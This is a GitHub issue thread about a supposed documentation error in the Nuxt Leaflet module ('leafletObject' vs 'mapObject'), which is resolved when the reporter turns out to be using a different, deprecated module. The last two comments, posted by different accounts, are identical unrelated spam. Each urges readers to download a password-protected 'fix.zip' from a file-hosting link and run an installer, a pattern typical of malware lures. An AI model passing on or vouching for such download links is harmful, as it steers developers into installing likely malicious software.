### ISSUE TITLE
Error in documentation. leafletObject -> mapObject

### ISSUE THREAD

**Issue by e6voe9** [nuxt-modules/leaflet#74]
https://leaflet.nuxtjs.org/guide/accessing-map-instance.html

LMap component.

It says that there is a way to access leafleft instance via `leafletObject`

```typescript
const onMapReady = () => {
    // Access the Leaflet map instance
    console.log(map.value.leafletObject)
}
```

In reality property called `mapObject`

<img width="1550" alt="image" src="https://github.com/user-attachments/assets/a0cfdc71-da2a-4fb3-97ee-a6fc8044264c">
<img width="422" alt="image" src="https://github.com/user-attachments/assets/f6009ae8-5c1c-49b2-ba7a-fd3f14217a6b">

**Comment by Gugustinette** [comment]
Where does this come from ?

In the vue-leaflet source code, it is exposed via `leafletObject` : [code](https://github.com/vue-leaflet/vue-leaflet/blob/db34dff79cc62bc6fa51357e953e9bcf55725c94/src/components/LMap.vue#L403) and [documentation](https://github.com/vue-leaflet/vue-leaflet/blob/db34dff79cc62bc6fa51357e953e9bcf55725c94/docs/faq/index.md?plain=1#L28)

**Comment by e6voe9** [comment]
I'm using 0.0.27 of nuxt-leaflet.
It has `"vue2-leaflet": "^2.7.1"` as a dependency.

**Comment by Gugustinette** [comment]
Oh you're on the wrong module lol, this one is `@nuxtjs/leaflet` and should have `vue-leaflet` in dependency.

This is probably the module you're using : https://github.com/schlunsen/nuxt-leaflet

**Comment by e6voe9** [comment]
wrong module it is

**Comment by Gugustinette** [comment]
If you want to use the Nuxt 3 module, you'll need to make sure to delete everything related to the deprecated `nuxt-leaflet` and follow [the instructions](https://leaflet.nuxtjs.org/getting-started/installation.html).

Can I close this issue now ?

**Comment by e6voe9** [comment]
Yes, fell free to close it.

Thank you

**Comment by xcloudzy** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by haohaohaoadsad** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
